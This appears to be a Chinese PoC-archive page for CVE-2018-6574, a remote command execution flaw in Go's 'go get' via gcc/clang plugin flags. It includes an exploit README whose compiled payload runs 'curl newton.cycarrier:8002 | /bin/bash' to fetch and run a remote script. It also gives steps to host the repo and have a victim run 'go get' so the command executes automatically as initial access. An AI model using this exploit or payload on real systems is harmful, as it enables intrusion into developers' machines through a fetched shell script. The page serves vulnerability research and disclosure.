关联漏洞
标题:
Google Go 安全漏洞
(CVE-2018-6574)
描述:Google Go是美国谷歌(Google)公司的一种针对多处理器系统应用程序的编程进行了优化的编程语言。 Google Go 1.8.7之前版本、1.9.4之前的1.9.x版本和1.10rc2之前的1.10 pre-releases版本中存在安全漏洞。远程攻击者可利用该漏洞执行命令。
介绍
CVE-2018-6574
===
Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow `go get` remote command execution during source code build, by leveraging the gcc or clang plugin feature, because `-fplugin=` and `-plugin=` arguments were not blocked. (from [mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6574))
## RCE command
The command was compiled into the dynamic library `calc_darwin.so`. And the current command is `curl newton.cycarrier:8002 | /bin/bash`. It was used as an intitial access of a program. You have to host a file server on port 8002 and bind the host to your IP.
## How to trigger?
At first, you have to install the required version of golang on the victim. Then, host this repo on a accessable git server. Finally, use `go get` command to gather this repo, and the command will be executed automatically.
Take my repo as example. You have to use the following command:
```
go get github.com/frozenkp/CVE-2018-6574
```
## Warning
This repo is only for evaluation purpose.
文件快照
[4.0K] /data/pocs/8c243820d1809c4d83b6fca60dd6f64a46a2b380
├── [ 12K] calc_darwin.so
├── [ 316] main.go
└── [1.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。